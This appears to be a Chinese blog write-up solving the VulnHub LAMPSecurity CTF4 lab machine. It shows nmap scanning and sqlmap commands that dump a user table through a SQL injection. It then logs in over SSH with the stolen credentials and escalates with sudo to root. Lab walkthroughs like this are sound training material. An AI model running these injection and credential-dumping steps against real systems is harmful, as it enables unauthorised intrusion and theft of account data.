lampsecurity—CTF4靶机详解
lampsecurity—CTF4靶机详解

lampsecurity—CTF4靶机详解

靶机来自vulnhub

内容
信息搜集
sql注入
ssh指定认证算法

nmap信息搜集

nmap -sn -oN ./host.txt 10.10.10.0/24 //主机发现
nmap -p- –min-rate 10000 -oN ./port.txt 10.10.10.106 //端口扫描
nmap -sT -sV -O -oN ./TCP.txt -p22,25,80,631 10.10.10.106 //TCP扫描,版本探测,系统探测
nmap -sU -p- –min-rate 10000 -oN ./UDP.txt 10.10.10.106 //UDP开放端口扫描
nmap –script=vuln -oN ./vuln.txt -p22,25,80,631 10.10.10.106 //脚本扫描,使用默认的vuln脚本扫描

根据脚本扫描看到该站点存在DOS漏洞,CSRF漏洞,SQL注入漏洞,但是DOS和CSRF漏洞利用较为困难,SQL注入漏洞可以获得更多的信息,可以访问站点看看是什么

显然该站点用了文件管理系统,CMS为webmaster,目录爆破找到后台管理界面

通过目录爆破有如下几个目录文件夹mail,admin,index.php,calendar,robots.txt
发现有如下内容
robots.txt

通过浏览站点,大部分都需要账号/密码所以可以利用之前nmap探测出来的SQL注入漏洞尝试获得账号密码
判断探测出的页面是否真的存在sql注入漏洞发现他把所以页面都显示出来了,说明存在sql注入漏洞

直接使用sqlmap直接拿到用户名密码
sudo sqlmap -u http://10.10.10.106/\?id=1\&page=blog\&title=Blog –dbs
sudo sqlmap -u http://10.10.10.106/\?id=1\&page=blog\&title=Blog -D ehks –tables
sudo sqlmap -u http://10.10.10.106/\?id=1\&page=blog\&title=Blog -D ehks -T user –dump

拿到用户名密码可以尝试ssh登录如果成功获得shell,如果失败利用用户获得,CMS后台,利用CMS后台再进一步获取shell。
ssh登录后发现登录的用户是最高权限(ALL) ALL,直接sudo运行bash获得root权限

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注